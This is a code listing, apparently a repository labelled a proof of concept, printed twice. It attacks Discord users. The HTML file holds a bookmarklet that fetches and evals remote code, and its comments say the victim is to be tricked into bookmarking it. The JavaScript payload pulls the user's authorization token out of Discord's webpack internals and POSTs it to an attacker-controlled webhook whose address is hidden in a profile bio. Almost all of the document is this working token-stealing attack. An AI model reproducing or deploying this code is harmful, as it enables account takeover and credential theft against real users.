oSumAtrIX/index.html

## index.html
<!--
 - Author: oSumAtrIX
 - Website: https://osumatrix.me
 - Date: 2022-04-29
 - License: GPL-3.0
 - Description:
 - Example page responsible to deliver the payload. Due to the CSP mechanism of browsers, the payload has to be delivered from the Discord domain.
   Upload `payload.txt.js` as an attached text file in a message on Discord and add it below to fetch and eval the payload.
   The victim is instructed to bookmark the href. Opening the bookmark will execute the script.
 -->

<html lang="en">
	<body>
		<a
			href="javascript:fetch('https://cdn.discordapp.com/attachments/SERVER_ID/CHANNEL_ID/payload.txt').then(result => result.text()).then(eval)"
		>
			CTRL+SHIFT+B & drag to favourites bar
		</a>
	</body>
</html>

## payload.txt.js
/**
 * Author: oSumAtrIX
 * Website: https://osumatrix.me
 * Date: 2022-04-29
 * License: GPL-3.0
 * Description:
 * This is a PoC payload to grab the authorization token of a user and send it to a webhook.
 * The attacker can use a predefined discord user's bio to get the webhook url dynamically.
 * The attacker can use the same technique to dynamically execute code remotely
 * by evaling code from an attachment inside a Discord users bio.
 */

(() => {
	// Do not proceed if the payload is being executed outside the Discord domain
	if (location.hostname != "discord.com") return;

	// Get webpack objects
	if (!window.webpackInstance) {
		window.webpackInstance = {};
		webpackChunkdiscord_app.push([
			[[""]],
			{},
			(query) => {
				window.webpackInstance.cache = query.c;
			},
		]);
	}

	// Optionally get some user information...
	// const user = Object.values(window.webpackInstance.cache)
	// 	.find((config) => {
	// 			return (
	// 					config.exports &&
	// 					config.exports.default &&
	// 					config.exports.default.getCurrentUser
	// 			)
	// 	})
	// 	.exports.default.getCurrentUser()

	// Get token to make further requests to Discord
	let token = Object.values(window.webpackInstance.cache)
		.find((config) => {
			return (
				config.exports &&
				config.exports.default &&
				config.exports.default.getToken
			);
		})
		.exports.default.getToken();

	// A Discord user id as a key to get the webhook address.
	let address_delivery = 0;
	fetch("https://discord.com/api/v9/users/" + address_delivery + "/profile", {
		headers: {
			authorization: token,
		},
	})
		.then((r) => r.json())
		.then((j) => {
			// The users bio contains the delivery address. A discord webhook.
			const webhook_address = j.user.bio;
			const webhook_url = "https://discord.com/api/webhooks/" + webhook_address;

			// Send payload
			fetch(webhook_url, {
				headers: { "content-type": "application/json" },
				body: JSON.stringify({ content: token }),
				method: "POST",
			});
		});

	// alert("PoC successfull!");
})();
	<!--
	- Author: oSumAtrIX
	- Website: https://osumatrix.me
	- Date: 2022-04-29
	- License: GPL-3.0
	- Description:
	- Example page responsible to deliver the payload. Due to the CSP mechanism of browsers, the payload has to be delivered from the Discord domain.
	Upload `payload.txt.js` as an attached text file in a message on Discord and add it below to fetch and eval the payload.
	The victim is instructed to bookmark the href. Opening the bookmark will execute the script.
	-->

	<html lang="en">
	<body>
	<a
	href="javascript:fetch('https://cdn.discordapp.com/attachments/SERVER_ID/CHANNEL_ID/payload.txt').then(result => result.text()).then(eval)"
	>
	CTRL+SHIFT+B & drag to favourites bar
	</a>
	</body>
	</html>
	/**
	* Author: oSumAtrIX
	* Website: https://osumatrix.me
	* Date: 2022-04-29
	* License: GPL-3.0
	* Description:
	* This is a PoC payload to grab the authorization token of a user and send it to a webhook.
	* The attacker can use a predefined discord user's bio to get the webhook url dynamically.
	* The attacker can use the same technique to dynamically execute code remotely
	* by evaling code from an attachment inside a Discord users bio.
	*/

	(() => {
	// Do not proceed if the payload is being executed outside the Discord domain
	if (location.hostname != "discord.com") return;

	// Get webpack objects
	if (!window.webpackInstance) {
	window.webpackInstance = {};
	webpackChunkdiscord_app.push([
	[[""]],
	{},
	(query) => {
	window.webpackInstance.cache = query.c;
	},
	]);
	}

	// Optionally get some user information...
	// const user = Object.values(window.webpackInstance.cache)
	// .find((config) => {
	// return (
	// config.exports &&
	// config.exports.default &&
	// config.exports.default.getCurrentUser
	// )
	// })
	// .exports.default.getCurrentUser()

	// Get token to make further requests to Discord
	let token = Object.values(window.webpackInstance.cache)
	.find((config) => {
	return (
	config.exports &&
	config.exports.default &&
	config.exports.default.getToken
	);
	})
	.exports.default.getToken();

	// A Discord user id as a key to get the webhook address.
	let address_delivery = 0;
	fetch("https://discord.com/api/v9/users/" + address_delivery + "/profile", {
	headers: {
	authorization: token,
	},
	})
	.then((r) => r.json())
	.then((j) => {
	// The users bio contains the delivery address. A discord webhook.
	const webhook_address = j.user.bio;
	const webhook_url = "https://discord.com/api/webhooks/" + webhook_address;

	// Send payload
	fetch(webhook_url, {
	headers: { "content-type": "application/json" },
	body: JSON.stringify({ content: token }),
	method: "POST",
	});
	});

	// alert("PoC successfull!");
	})();